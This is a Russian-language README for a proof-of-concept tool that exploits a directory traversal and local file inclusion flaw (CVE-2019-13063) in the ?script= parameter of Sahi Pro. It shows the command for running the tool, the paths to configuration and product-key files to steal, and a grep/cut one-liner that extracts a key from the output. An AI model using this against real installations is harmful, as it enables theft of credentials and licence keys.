
Инструмент для подтверждения концепции эксплуатации уязвимости обхода каталогов и включения локальных файлов в веб-приложении Sahi-pro CVE-2019-13063
В веб-приложении управления сценариями Sahi-pro была обнаружена уязвимость обхода каталога и файла, которая находится в параметре ?script= на странице /Script_view. Злоумышленник может отправить специально созданный URL-адрес для получения и кражи конфиденциальных файлов у жертвы.
Это инструмент доказательства концепции для эксплуатации уязвимости обхода каталога и файла в веб-приложении Sahi-pro.
Воздействие: В программном обеспечении веб-приложения Sahi-pro существует уязвимость обхода каталога и файла, которая приводит к утечке конфиденциальной информации из приложения или может быть использована для извлечения системных файлов напрямую.
Параметр ?script= на странице script_view подвержен обходу файла и каталога для просмотра содержимого файлов.
Запустите так:
$ python3 CVE-2019-13063-POC.py --url http://example:[REDACTED]
Это загрузит ключ продукта приложения.
Укажите полный URL-адрес, включая файл, который вы хотите загрузить, добавленный к уязвимому параметру ?script=.
usage: CVE-2019-13063-POC.py [-h] [--url URL]
optional arguments:
-h, --help show this help message and exit
--url URL Specify the vulnerable URL
Sahi User properties file - \sahi_pro\userdata\config\userdata.properties
Sahi data profile - \sahi_pro\userdata\browser\ff\profiles\sahi0\prefs.js
Sahi properties file - \sahi_pro\config\sahi.properties
Sahi Product key location - \config\productkey.txt
Этот скрипт просто пытается загрузить всю страницу; вы можете легко извлечь нужное содержимое со страницы, так как оно находится между уникальными параметрами HTML <ol><li>, с помощью простого однострочного скрипта bash.
Пример извлечения ключа продукта:
cat output.txt | grep "<ol><li>" | cut -d ">" -f3 | cut -d "<" -f1
1a79a4d60de6718e8e5b326e338ae533